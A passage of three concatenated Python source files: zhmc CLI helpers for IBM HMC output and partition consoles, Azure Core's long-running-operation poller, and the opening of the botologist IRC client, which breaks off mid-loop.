"""
Click callback function that aborts the current command if the option
value is false.
Because this used as a reaction to an interactive confirmation question,
we issue the error message always in a human readable format (i.e. ignore
the specified error format).
Note that abortion mechanisms such as ctx.abort() or raising click.Abort
terminate the CLI completely, and not just the current command. This makes
a difference in the interactive mode.
Parameters:
ctx (:class:`click.Context`): The click context object. Created by the
``@click.pass_context`` decorator.
param (class:`click.Option`): The click option that used this callback.
value: The option value to be tested.
"""
# pylint: disable=unused-argument
if not value:
# click.ClickException seems to be the only reasonable exception we
# can raise here, but it prefixes the error text with 'Error: ', which
# is confusing in this case, because the user simply decided to abort.
# We therefore play the trick with overwriting that prefix.
raise click.ClickException("\rAborted!")
class InvalidOutputFormatError(click.ClickException):
"""
Exception indicating an invalid output format for zhmc.
"""
def __init__(self, output_format):
msg = "Invalid output format: {of}".format(of=output_format)
super(InvalidOutputFormatError, self).__init__(msg)
class CmdContext(object):
"""
A context object we attach to the :class:`click.Context` object in its
``obj`` attribute. It is used to provide command line options and other
data.
"""
def __init__(self, host, userid, password, no_verify, ca_certs,
output_format, transpose, error_format, timestats, session_id,
get_password):
self._host = host
self._userid = userid
self._password = password
self._no_verify = no_verify
self._ca_certs = ca_certs
self._output_format = output_format
self._transpose = transpose
self._error_format = error_format
self._timestats = timestats
self._session_id = session_id
self._get_password = get_password
self._session = None
self._spinner = click_spinner.Spinner()
def __repr__(self):
ret = "CmdContext(at 0x{ctx:08x}, host={s._host!r}, " \
"userid={s._userid!r}, password={pw!r}, " \
"no_verify={s._no_verify!r}, ca_certs={s._ca_certs!r}, " \
"output_format={s._output_format!r}, transpose={s._transpose!r}, " \
"error_format={s._error_format!r}, timestats={s._timestats!r}," \
"session_id={s._session_id!r}, session={s._session!r}, ...)". \
format(ctx=id(self), s=self, pw='...' if self._password else None)
return ret
@property
def host(self):
"""
:term:`string`: Hostname or IP address of the HMC.
"""
return self._host
@property
def userid(self):
"""
:term:`string`: Userid on the HMC.
"""
return self._userid
@property
def no_verify(self):
"""
bool: Do not verify the server certificate presented by the HMC
during SSL/TLS handshake.
"""
return self._no_verify
@property
def ca_certs(self):
"""
:term:`string`: Path name of certificate file or directory with CA
certificates for verifying the HMC certificate. If `None`, the
zhmcclient will be set up to use the 'certifi' package.
"""
return self._ca_certs
@property
def output_format(self):
"""
:term:`string`: Output format to be used.
"""
return self._output_format
@property
def transpose(self):
"""
bool: Transpose the output table.
"""
return self._transpose
@property
def error_format(self):
"""
:term:`string`: Error message format to be used.
"""
return self._error_format
@property
def timestats(self):
"""
bool: Indicates whether time statistics should be printed.
"""
return self._timestats
@property
def session_id(self):
"""
:term:`string` or :class:`~zhmcclient_mock.FakedSession`:
If string: Session-id of real session to be used.
If `None`: Create a new real session using host, userid, password.
If FakedSession: Faked session to be used.
"""
return self._session_id
@property
def get_password(self):
"""
:term:`callable`: Password retrieval function, or `None`.
"""
return self._get_password
@property
def session(self):
"""
The session to be used, or `None` if a session has not yet been
created. The session may be a :class:`zhmcclient.Session` or
:class:`zhmcclient_mock.FakedSession` object.
"""
return self._session
@property
def spinner(self):
"""
:class:`~click_spinner.Spinner` object.
Since click_spinner 0.1.5, the Spinner object takes care of suppressing
the spinner when not on a tty, and is able to suspend/resume the
spinner via its stop() and start() methods.
"""
return self._spinner
def execute_cmd(self, cmd):
"""
Execute the command.
"""
if self._session is None:
if isinstance(self._session_id, zhmcclient_mock.FakedSession):
self._session = self._session_id
else:
if self._host is None:
raise click_exception("No HMC host provided",
self._error_format)
if self._no_verify:
verify_cert = False
elif self._ca_certs is None:
verify_cert = True # Use 'certifi' package
else:
verify_cert = self._ca_certs
self._session = zhmcclient.Session(
self._host, self._userid, self._password,
session_id=self._session_id,
get_password=self._get_password,
verify_cert=verify_cert)
if self.timestats:
self._session.time_stats_keeper.enable()
self.spinner.start()
try:
cmd()
except zhmcclient.Error as exc:
raise click_exception(exc, self.error_format)
finally:
self.spinner.stop()
if self._session.time_stats_keeper.enabled:
click.echo(self._session.time_stats_keeper)
def original_options(options):
"""
Return the input options with their original names.
This is used to undo the name change the click package applies
automatically before passing the options to the function that was decorated
with 'click.option()'. The original names are needed in case there is
special processing of the options on top of 'options_to_properties()'.
The original names are constructed by replacing any underscores '_' with
hyphens '-'. This approach may not be perfect in general, but it works for
the zhmc CLI because the original option names do not have any underscores.
Parameters:
options (dict): The click options dictionary as passed to the decorated
function by click (key: option name as changed by click, value: option
value).
Returns:
dict: Options with their original names.
"""
org_options = {}
for name, value in six.iteritems(options):
org_name = name.replace('_', '-')
org_options[org_name] = value
return org_options
def options_to_properties(options, name_map=None):
"""
Convert click options into HMC resource properties.
The click option names in input parameters to this function are the
original option names (e.g. as produced by `original_options()`.
Options with a value of `None` are not added to the returned resource
properties.
If a name mapping dictionary is specified, the option names are mapped
using that dictionary. If an option name is mapped to `None`, it is not
going to be added to the set of returned resource properties.
Parameters:
options (dict): The options dictionary (key: original option name,
value: option value).
name_map (dict): `None` or name mapping dictionary (key: original
option name, value: property name, or `None` to not add this option to
the returned properties).
Returns:
dict: Resource properties (key: property name, value: option value)
"""
properties = {}
for name, value in six.iteritems(options):
if value is None:
continue
if name_map:
name = name_map.get(name, name)
if name is not None:
properties[name] = value
return properties
def print_properties(cmd_ctx, properties, output_format, show_list=None):
"""
Print properties in the desired output format.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
properties (dict): The properties.
output_format (string): Output format from the command line.
show_list (iterable of string): The property names to be shown.
If `None`, all properties are shown.
"""
if output_format in TABLE_FORMATS:
if output_format == 'table':
output_format = 'psql'
print_properties_as_table(cmd_ctx, properties, output_format, show_list)
elif output_format == 'json':
print_properties_as_json(cmd_ctx, properties, show_list)
else:
raise InvalidOutputFormatError(output_format)
def print_resources(
cmd_ctx, resources, output_format, show_list=None, additions=None,
all=False):
# pylint: disable=redefined-builtin
"""
Print the properties of a list of resources in the desired output format.
While accessing the properties of the resources, they are fetched from
the HMC as needed.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
resources (iterable of BaseResource):
The resources.
output_format (string): Output format from command line.
show_list (iterable of string):
The property names to be shown. If a property is not in the resource
object, it will be retrieved from the HMC. This iterable also defines
the order of columns in the table, from left to right in iteration
order.
If `None`, all properties in the resource objects are shown, and their
column order is ascending by property name.
additions (dict of dict of values): Additional properties,
as a dict keyed by the property name (which also needs to be listed in
`show_list`),
whose value is a dict keyed by the resource URI,
whose value is the value to be shown.
If `None`, no additional properties are defined.
all (bool): Add all remaining properties in sorted order.
Raises:
InvalidOutputFormatError
zhmcclient.HTTPError
zhmcclient.ParseError
zhmcclient.AuthError
zhmcclient.ConnectionError
"""
if output_format in TABLE_FORMATS:
if output_format == 'table':
output_format = 'psql'
print_resources_as_table(
cmd_ctx, resources, output_format, show_list, additions, all)
elif output_format == 'json':
print_resources_as_json(cmd_ctx, resources, show_list, additions, all)
else:
raise InvalidOutputFormatError(output_format)
def print_properties_as_table(
cmd_ctx, properties, table_format, show_list=None):
"""
Print properties in tabular output format.
The order of rows is ascending by property name.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
properties (dict): The properties.
table_format (string): Supported table formats are:
- "table" -> same like "psql"
- "plain"
- "simple"
- "psql"
- "rst"
- "mediawiki"
- "html"
- "latex"
show_list (iterable of string): The property names to be shown.
If `None`, all properties are shown.
"""
headers = ['Field Name', 'Value']
out_str = dict_as_table(properties, headers, table_format, show_list)
cmd_ctx.spinner.stop()
click.echo(out_str)
def print_resources_as_table(
cmd_ctx, resources, table_format, show_list=None, additions=None,
all=False):
# pylint: disable=redefined-builtin
"""
Print resources in tabular output format.
While accessing the properties of the resources, they are fetched from
the HMC as needed.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
resources (iterable of BaseResource):
The resources.
table_format (string): Supported table formats are:
- "table" -> same like "psql"
- "plain"
- "simple"
- "psql"
- "rst"
- "mediawiki"
- "html"
- "latex"
show_list (iterable of string):
The property names to be shown. If a property is not in the resource
object, it will be retrieved from the HMC. This iterable also defines
the order of columns in the table, from left to right in iteration
order.
If `None`, all properties in the resource objects are shown, and their
column order is ascending by property name.
additions (dict of dict of values): Additional properties,
as a dict keyed by the property name (which also needs to be listed in
`show_list`),
whose value is a dict keyed by the resource URI,
whose value is the value to be shown.
If `None`, no additional properties are defined.
all (bool): Add all remaining properties in sorted order.
Raises:
zhmcclient.HTTPError
zhmcclient.ParseError
zhmcclient.AuthError
zhmcclient.ConnectionError
"""
inner_format = INNER_TABLE_FORMAT.get(table_format, table_format)
prop_names = OrderedDict() # key: property name, value: None
remaining_prop_names = OrderedDict() # key: property name, value: None
resource_props_list = []
for resource in resources:
resource_props = {}
if show_list:
for name in show_list:
if additions and name in additions:
value = additions[name][resource.uri]
else:
# May raise zhmcclient exceptions
value = resource.prop(name)
resource_props[name] = value
prop_names[name] = None
else:
for name in sorted(resource.properties.keys()):
# May raise zhmcclient exceptions
resource_props[name] = resource.prop(name)
prop_names[name] = None
if all:
resource.pull_full_properties()
for name in resource.properties.keys():
if name not in prop_names:
# May raise zhmcclient exceptions
resource_props[name] = resource.prop(name)
remaining_prop_names[name] = None
resource_props_list.append(resource_props)
prop_names = list(prop_names.keys()) + sorted(remaining_prop_names)
table = []
for resource_props in resource_props_list:
row = []
for name in prop_names:
value = resource_props.get(name, None)
value = value_as_table(value, inner_format)
row.append(value)
table.append(row)
cmd_ctx.spinner.stop()
if not table:
click.echo("No resources.")
else:
sorted_table = sorted(table, key=lambda row: row[0])
out_str = tabulate(sorted_table, prop_names, tablefmt=table_format)
click.echo(out_str)
def dict_as_table(data, headers, table_format, show_list=None):
"""
Return a string with the dictionary data in tabular output format.
The order of rows is ascending by dictionary key.
Parameters:
data (dict): The dictionary data.
headers (list): The text for the header row. `None` means no header row.
table_format: Table format, see print_resources_as_table().
show_list (iterable of string): The dict keys to be shown.
If `None`, all dict keys are shown.
"""
if table_format == 'repr':
ret_str = repr(data)
else:
table = []
inner_format = INNER_TABLE_FORMAT.get(table_format, table_format)
sorted_fields = sorted(data)
for field in sorted_fields:
if show_list is None or field in show_list:
value = value_as_table(data[field], inner_format)
table.append((field, value))
ret_str = tabulate(table, headers, tablefmt=table_format)
return ret_str
def list_as_table(data, table_format):
"""
Return a string with the list data in tabular output format.
The order of rows is the order of items in the list.
Parameters:
data (list): The list data.
table_format: Table format, see print_resources_as_table().
"""
if table_format == 'repr':
ret_str = repr(data)
else:
table = []
inner_format = INNER_TABLE_FORMAT.get(table_format, table_format)
for value in data:
value = value_as_table(value, inner_format)
table.append((value,))
ret_str = tabulate(table, headers=[], tablefmt=table_format)
return ret_str
def value_as_table(value, table_format):
"""
Return the value in the table format.
Parameters:
value (dict or list or simple type): The value to be converted.
table_format (string): The table format to be used.
Returns:
string or simple type: The value in the table format.
"""
if isinstance(value, list):
value = list_as_table(value, table_format)
elif isinstance(value, (dict, OrderedDict)):
value = dict_as_table(value, [], table_format)
else:
# format the single value
# TODO: Make the formatting less hard coded.
if isinstance(value, float):
value = '{0:.2f}'.format(value)
return value
def print_properties_as_json(cmd_ctx, properties, show_list=None):
"""
Print properties in JSON output format.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
properties (dict): The properties.
show_list (iterable of string):
The property names to be shown. The property name must be in the
`properties` dict.
If `None`, all properties in the `properties` dict are shown.
"""
show_properties = OrderedDict()
for pname in properties:
if show_list is None or pname in show_list:
show_properties[pname] = properties[pname]
json_str = json.dumps(show_properties)
cmd_ctx.spinner.stop()
click.echo(json_str)
def print_resources_as_json(
cmd_ctx, resources, show_list=None, additions=None, all=False):
# pylint: disable=redefined-builtin
"""
Print resources in JSON output format.
While accessing the properties of the resources, they are fetched from
the HMC as needed.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
resources (iterable of BaseResource):
The resources.
show_list (iterable of string):
The property names to be shown. If a property is not in a resource
object, it will be retrieved from the HMC.
If `None`, all properties in the input resource objects are shown.
additions (dict of dict of values): Additional properties,
as a dict keyed by the property name (which also needs to be listed in
`show_list`),
whose value is a dict keyed by the resource URI,
whose value is the value to be shown.
If `None`, no additional properties are defined.
all (bool): Add all remaining properties in sorted order.
Raises:
zhmcclient.HTTPError
zhmcclient.ParseError
zhmcclient.AuthError
zhmcclient.ConnectionError
"""
prop_names = OrderedDict() # key: property name, value: None
resource_props_list = []
for resource in resources:
resource_props = {}
if show_list:
for name in show_list:
if additions and name in additions:
value = additions[name][resource.uri]
else:
# May raise zhmcclient exceptions
value = resource.prop(name)
resource_props[name] = value
prop_names[name] = None
else:
for name in sorted(resource.properties.keys()):
# May raise zhmcclient exceptions
resource_props[name] = resource.prop(name)
prop_names[name] = None
if all:
resource.pull_full_properties()
for name in resource.properties.keys():
if name not in prop_names:
# May raise zhmcclient exceptions
resource_props[name] = resource.prop(name)
prop_names[name] = None
resource_props_list.append(resource_props)
json_obj = []
for resource_props in resource_props_list:
json_res = OrderedDict()
for name in prop_names:
value = resource_props.get(name, None)
json_res[name] = value
json_obj.append(json_res)
json_str = json.dumps(json_obj)
cmd_ctx.spinner.stop()
click.echo(json_str)
class ExceptionThread(threading.Thread):
"""
A thread class derived from :class:`py:threading.Thread` that handles
exceptions that are raised in the started thread, by re-raising them in
the thread that joins the started thread.
The thread function needs to be specified with the 'target' init argument.
"""
def __init__(self, *args, **kwargs):
super(ExceptionThread, self).__init__(*args, **kwargs)
self.exc_info = None
def run(self):
"""
Call inherited run() and save exception info.
"""
try:
super(ExceptionThread, self).run()
except Exception: # noqa: E722 pylint: disable=broad-except
self.exc_info = sys.exc_info()
def join(self, timeout=None):
"""
Call inherited join() and reraise exception if exception info was saved.
"""
super(ExceptionThread, self).join(timeout)
if self.exc_info:
six.reraise(*self.exc_info)
def console_log(logger, prefix, message, *args, **kwargs):
"""
Log a message after prepending it with a prefix, to the specified logger
using the debug log level.
"""
message = prefix + message
logger.debug(message, *args, **kwargs)
def display_messages(receiver, logger, prefix):
"""
Receive the OS message notifications in the specified receiver and
print them to stdout. The function returns when the receiver is
exhausted (which happens when it is closed).
Due to inconsistencies in the message text w.r.t. newline, some processing
is performed regarding trailing newlines.
"""
console_log(logger, prefix, "Message display thread has started")
for headers, message in receiver.notifications():
console_log(logger, prefix,
"Received OS message notification "
"session-sequence-nr=%s", headers['session-sequence-nr'])
for msg_info in message['os-messages']:
msg_txt = msg_info['message-text']
console_log(logger, prefix,
"Message id=%s, os=%r, refresh=%r, prompt=%r: %r",
msg_info['message-id'], msg_info['os-name'],
msg_info['is-refresh'], msg_info['prompt-text'],
msg_txt)
is_prompt = re.match(r'^.*[\$#] ?$', msg_txt)
is_login = re.match(r'^.*[Ll]ogin: ?$', msg_txt)
is_password = re.match(r'^[Pp]assword: *$', msg_txt)
if is_prompt or is_login or is_password:
msg_txt = msg_txt.rstrip('\n')
else:
if not msg_txt.endswith('\n'):
msg_txt += '\n'
click.echo(msg_txt, nl=False)
console_log(logger, prefix, "Message display thread is ending")
def part_console(session, part, refresh, logger):
"""
Establish an interactive shell to the console of the operating system
running in a partition or LPAR.
Any incoming OS messages of the console are printed concurrently with
waiting for and sending the next command.
The shell ends and this function returns if one of the exit commands
is entered.
Parameters:
session (Session): HMC session supplying the credentials.
part (Partition or Lpar): Resource object for the partition or LPAR.
refresh (bool): Include refresh messages.
logger (Logger): Python logger for any log messages.
Raises:
Exceptions derived from zhmcclient.Error
AssertionError
"""
if isinstance(part, zhmcclient.Partition):
part_term = 'partition'
else:
part_term = 'LPAR'
cpc = part.manager.parent
prefix = "{c} {p} ".format(c=cpc.name, p=part.name)
console_log(logger, prefix, "Operating system console session opened")
console_log(logger, prefix, "Include refresh messages: %s", refresh)
try:
topic = part.open_os_message_channel(include_refresh_messages=refresh)
console_log(logger, prefix, "Using new notification topic: %s", topic)
except zhmcclient.HTTPError as exc:
if exc.http_status == 409 and exc.reason == 331:
# Notification topic for this partition already exists, use it
topic_dicts = session.get_notification_topics()
topic = None
for topic_dict in topic_dicts:
if topic_dict['topic-type'] != 'os-message-notification':
continue
obj_uri = topic_dict['object-uri']
if part.uri in (obj_uri, '/api/partitions/' + obj_uri):
topic = topic_dict['topic-name']
console_log(logger, prefix,
"Using existing notification topic: %s "
"(object-uri: %s)", topic, obj_uri)
break
assert topic, \
"An OS message notification topic for {pt} {pn} (uri={pu}) " \
"supposedly exists, but cannot be found in the existing " \
"topics: {t})". \
format(pt=part_term, pn=part.name, pu=part.uri, t=topic_dicts)
else:
raise
# pylint: disable=protected-access
if not session._password:
# pylint: disable=protected-access
session._password = click.prompt(
"Enter password (for user {s.userid} at HMC {s.host})"
.format(s=session),
hide_input=True, confirmation_prompt=False, type=str, err=True)
# pylint: disable=protected-access
receiver = zhmcclient.NotificationReceiver(
topic, session.host, session.userid, session._password)
msg_thread = ExceptionThread(
target=display_messages, args=(receiver, logger, prefix))
click.echo("Connected to operating system console for {pt} {pn}".
format(pt=part_term, pn=part.name))
click.echo("Enter ':exit' or press <CTRL-C> or <CTRL-D> to exit.")
console_log(logger, prefix, "Starting message display thread")
msg_thread.start()
while True:
try:
# This has history/ editing support when readline is imported
line = six.moves.input()
except EOFError:
# CTRL-D was pressed
reason = "CTRL-D"
break
except KeyboardInterrupt:
# CTRL-C was pressed
reason = "CTRL-C"
break
if line == ':exit':
reason = "{c} command".format(c=line)
break
if line == '':
# Enter was pressed without other input.
# The HMC requires at least one character in the command, otherwise
# it returns an error.
line = ' '
part.send_os_command(line, is_priority=False)
console_log(logger, prefix,
"User requested to exit the console session via %s", reason)
console_log(logger, prefix, "Closing notification receiver")
# This causes the notification receiver to be exhausted, and in turn causes
# the message display thread to end.
receiver.close()
console_log(logger, prefix, "Waiting for message display thread to end")
msg_thread.join()
console_log(logger, prefix, "Operating system console session closed")
click.echo("\nConsole session closed.")
def click_exception(exc, error_format):
"""
Return a ClickException object with the message from an input exception
in a desired error message format.
Parameters:
exc (exception or string):
The exception or the message.
error_format (string):
The error format (see ``--error-format`` general option).
Returns:
click.ClickException: The new exception.
"""
if error_format == 'def':
if isinstance(exc, zhmcclient.Error):
error_str = exc.str_def()
else:
assert isinstance(exc, six.string_types)
error_str = "classname: None, message: {msg}".format(msg=exc)
else:
assert error_format == 'msg'
if isinstance(exc, zhmcclient.Error):
error_str = "{exc}: {msg}".format(
exc=exc.__class__.__name__, msg=exc)
else:
assert isinstance(exc, six.string_types)
error_str = exc
new_exc = click.ClickException(error_str)
new_exc.__cause__ = None
return new_exc
def add_options(click_options):
"""
Decorator that adds multiple Click options to the decorated function.
The list is reversed because of the way Click processes options.
Note: This function has its origins in the
https://github.com/pywbem/pywbemtools project (Apache 2.0 license)
Parameters:
click_options (list): List of `click.option` objects.
"""
def _add_options(func):
"""
Apply the Click options to the function in reversed order.
"""
for option in reversed(click_options):
func = option(func)
return func
return _add_options
def storage_management_feature(cpc_or_partition):
"""
Return a boolean indicating whether the specified CPC, or the CPC of the
specified partition has the DPM storage management feature enabled.
On z13 and earlier, the storage managemt feature is always disabled.
On z14 and later, the storage managemt feature is always enabled.
Nevertheless, this function performs the proper lookup of the feature.
"""
features = cpc_or_partition.prop('available-features-list', [])
for f in features:
if f['name'] == 'dpm-storage-management':
return f['state']
return False
def hide_property(properties, prop_name):
"""
Hide a property, if it exists and is not empty.
This is done by modifying the value of the property in the 'properties'
parameter.
Parameters:
properties(dict): Dict of properties (name/value). May be changed.
prop_name(string): Property name to hide
"""
if prop_name in properties and properties[prop_name]:
properties[prop_name] = "... (hidden)"
|
_poller.py
|
# --------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
# --------------------------------------------------------------------------
import base64
import threading
import uuid
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from typing import TYPE_CHECKING, TypeVar, Generic
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
from typing import Any, Callable, Union, List, Optional, Tuple
PollingReturnType = TypeVar("PollingReturnType")
class PollingMethod(Generic[PollingReturnType]):
"""ABC class for polling method.
"""
def initialize(self, client, initial_response, deserialization_callback):
# type: (Any, Any, Any) -> None
raise NotImplementedError("This method needs to be implemented")
def run(self):
# type: () -> None
raise NotImplementedError("This method needs to be implemented")
def status(self):
# type: () -> str
raise NotImplementedError("This method needs to be implemented")
def finished(self):
# type: () -> bool
raise NotImplementedError("This method needs to be implemented")
def resource(self):
# type: () -> PollingReturnType
raise NotImplementedError("This method needs to be implemented")
def get_continuation_token(self):
# type() -> str
raise TypeError(
"Polling method '{}' doesn't support get_continuation_token".format(
self.__class__.__name__
)
)
@classmethod
def from_continuation_token(cls, continuation_token, **kwargs):
# type(str, Any) -> Tuple[Any, Any, Callable]
raise TypeError(
"Polling method '{}' doesn't support from_continuation_token".format(
cls.__name__
)
)
class NoPolling(PollingMethod):
"""An empty poller that returns the deserialized initial response.
"""
def __init__(self):
self._initial_response = None
self._deserialization_callback = None
def initialize(self, _, initial_response, deserialization_callback):
# type: (Any, Any, Callable) -> None
self._initial_response = initial_response
self._deserialization_callback = deserialization_callback
def run(self):
# type: () -> None
"""Empty run, no polling.
"""
def status(self):
# type: () -> str
"""Return the current status as a string.
:rtype: str
"""
return "succeeded"
def finished(self):
# type: () -> bool
"""Is this polling finished?
:rtype: bool
"""
return True
def resource(self):
# type: () -> Any
return self._deserialization_callback(self._initial_response)
def get_continuation_token(self):
# type() -> str
import pickle
return base64.b64encode(pickle.dumps(self._initial_response)).decode('ascii')
@classmethod
def from_continuation_token(cls, continuation_token, **kwargs):
# type(str, Any) -> Tuple
try:
deserialization_callback = kwargs["deserialization_callback"]
except KeyError:
raise ValueError("Need kwarg 'deserialization_callback' to be recreated from continuation_token")
import pickle
initial_response = pickle.loads(base64.b64decode(continuation_token))
return None, initial_response, deserialization_callback
class LROPoller(Generic[PollingReturnType]):
"""Poller for long running operations.
:param client: A pipeline service client
:type client: ~azure.core.PipelineClient
:param initial_response: The initial call response
:type initial_response: ~azure.core.pipeline.PipelineResponse
:param deserialization_callback: A callback that takes a Response and return a deserialized object.
If a subclass of Model is given, this passes "deserialize" as callback.
:type deserialization_callback: callable or msrest.serialization.Model
:param polling_method: The polling strategy to adopt
:type polling_method: ~azure.core.polling.PollingMethod
"""
def __init__(self, client, initial_response, deserialization_callback, polling_method):
# type: (Any, Any, Callable, PollingMethod[PollingReturnType]) -> None
self._callbacks = [] # type: List[Callable]
self._polling_method = polling_method
# This implicit test avoids bringing in an explicit dependency on Model directly
try:
deserialization_callback = deserialization_callback.deserialize # type: ignore
except AttributeError:
pass
# Might raise a CloudError
self._polling_method.initialize(client, initial_response, deserialization_callback)
# Prepare thread execution
self._thread = None
self._done = None
self._exception = None
if not self._polling_method.finished():
self._done = threading.Event()
self._thread = threading.Thread(
target=with_current_context(self._start),
name="LROPoller({})".format(uuid.uuid4()))
self._thread.daemon = True
self._thread.start()
def _start(self):
"""Start the long running operation.
On completion, runs any callbacks.
:param callable update_cmd: The API request to check the status of
the operation.
"""
try:
self._polling_method.run()
except Exception as err: #pylint: disable=broad-except
self._exception = err
finally:
self._done.set()
callbacks, self._callbacks = self._callbacks, []
while callbacks:
for call in callbacks:
call(self._polling_method)
callbacks, self._callbacks = self._callbacks, []
def polling_method(self):
# type: () -> PollingMethod[PollingReturnType]
"""Return the polling method associated to this poller.
"""
return self._polling_method
def continuation_token(self):
# type: () -> str
"""Return a continuation token that allows to restart the poller later.
:returns: An opaque continuation token
:rtype: str
"""
return self._polling_method.get_continuation_token()
@classmethod
def from_continuation_token(cls, polling_method, continuation_token, **kwargs):
# type: (PollingMethod[PollingReturnType], str, Any) -> LROPoller[PollingReturnType]
client, initial_response, deserialization_callback = polling_method.from_continuation_token(
continuation_token, **kwargs
)
return cls(client, initial_response, deserialization_callback, polling_method)
def status(self):
# type: () -> str
"""Returns the current status string.
:returns: The current status string
:rtype: str
"""
return self._polling_method.status()
def result(self, timeout=None):
# type: (Optional[int]) -> PollingReturnType
"""Return the result of the long running operation, or
the result available after the specified timeout.
:returns: The deserialized resource of the long running operation,
if one is available.
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
self.wait(timeout)
return self._polling_method.resource()
@distributed_trace
def wait(self, timeout=None):
# type: (Optional[int]) -> None
"""Wait on the long running operation for a specified length
of time. You can check if this call as ended with timeout with the
"done()" method.
:param int timeout: Period of time to wait for the long running
operation to complete (in seconds).
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
if self._thread is None:
return
self._thread.join(timeout=timeout)
try:
# Let's handle possible None in forgiveness here
# https://github.com/python/mypy/issues/8165
raise self._exception # type: ignore
except TypeError: # Was None
pass
def done(self):
# type: () -> bool
"""Check status of the long running operation.
:returns: 'True' if the process has completed, else 'False'.
:rtype: bool
"""
return self._thread is None or not self._thread.is_alive()
def add_done_callback(self, func):
# type: (Callable) -> None
"""Add callback function to be run once the long running operation
has completed - regardless of the status of the operation.
:param callable func: Callback function that takes at least one
argument, a completed LongRunningOperation.
"""
# Still use "_done" and not "done", since CBs are executed inside the thread.
if self._done is None or self._done.is_set():
func(self._polling_method)
# Let's add them still, for consistency (if you wish to access to it for some reasons)
self._callbacks.append(func)
def remove_done_callback(self, func):
# type: (Callable) -> None
"""Remove a callback from the long running operation.
:param callable func: The function to be removed from the callbacks.
:raises ValueError: if the long running operation has already completed.
"""
if self._done is None or self._done.is_set():
raise ValueError("Process is complete.")
self._callbacks = [c for c in self._callbacks if c != func]
|
irc.py
|
import logging
log = logging.getLogger(__name__)
import signal
import socket
import ssl
import threading
import botologist.util
import botologist.protocol
def get_client(config):
nick = config.get('nick', 'botologist')
def _make_server_obj(cfg):
if isinstance(cfg, dict):
return Server(**cfg)
elif isinstance(cfg, str):
return Server(cfg)
else:
raise ValueError(
'server config must be dict or str, {} given'.format(type(cfg))
)
if 'servers' in config:
assert isinstance(config['servers'], list)
servers = (_make_server_obj(s) for s in config['servers'])
else:
servers = (_make_server_obj(config['server']),)
server_pool = ServerPool(servers)
return Client(
server_pool,
nick=nick,
username=config.get('username', nick),
realname=config.get('realname', nick),
)
def _find_user(channel, host, nick):
if channel:
user = channel.find_user(identifier=host, name=nick)
if user:
return user
if host and nick:
return User(nick, host)
return None
class Client(botologist.protocol.Client):
MAX_MSG_CHARS = 500
PING_EVERY = 3 * 60 # seconds
PING_TIMEOUT = 20 # seconds
def __init__(self, server_pool, nick, username=None, realname=None):
super().__init__(nick)
self.server_pool = server_pool
self.server = None
self.username = username or nick
self.realname = realname or nick
self.irc_socket = None
self.quitting = False
self.reconnect_timer = False
self.ping_timer = None
self.ping_response_timer = None
self.connect_thread = None
def join_channels():
for channel in self.channels.values():
self.join_channel(channel)
self.on_connect.append(join_channels)
def run_forever(self):
log.info('Starting IRC client')
def sigterm_handler(signo, stack_frame): # pylint: disable=unused-argument
self.stop('Terminating, probably back soon!')
signal.signal(signal.SIGQUIT, sigterm_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
signal.signal(signal.SIGINT, sigterm_handler)
try:
self.connect()
except (InterruptedError, SystemExit, KeyboardInterrupt):
self.stop('Terminating, probably back soon!')
except:
self.stop('An error occured!')
raise
def connect(self):
if self.irc_socket is not None:
self.disconnect()
if self.connect_thread is not None and self.connect_thread.isAlive():
log.warning('connect_thread is already alive, not doing anything')
return
self.connect_thread = threading.Thread(
target=self._wrap_error_handler(self._connect)
)
self.connect_thread.start()
def disconnect(self):
if self.connect_thread is None or not self.connect_thread.isAlive():
log.warning('connect_thread is not alive, not doing anything')
return
for callback in self.on_disconnect:
callback()
log.info('Disconnecting')
self.quitting = True
self.irc_socket.close()
self.irc_socket = None
def reconnect(self, time=None):
if self.irc_socket:
self.disconnect()
if self.connect_thread is not None and self.connect_thread.isAlive():
log.warning('connect_thread is already alive, not doing anything')
return
if time:
log.info('Reconnecting in %d seconds', time)
self.connect_thread = self.reconnect_timer = threading.Timer(
time,
self._wrap_error_handler(self._connect),
)
else:
self.connect_thread = threading.Thread(
target=self._wrap_error_handler(self._connect),
)
self.connect_thread.start()
def _connect(self):
self.quitting = False
if self.reconnect_timer:
self.reconnect_timer = None
self.server = self.server_pool.get()
log.info('Connecting to %s:%s', self.server.host, self.server.port)
self.irc_socket = IRCSocket(self.server)
self.irc_socket.connect()
log.info('Successfully connected to server!')
self.send('NICK ' + self.nick)
self.send('USER ' + self.username + ' 0 * :' + self.realname)
self.loop()
def loop(self):
while self.irc_socket:
try:
data = self.irc_socket.recv()
except OSError:
if self.quitting:
log.info('socket.recv threw an OSError, but quitting, '
'so exiting loop', exc_info=True)
else:
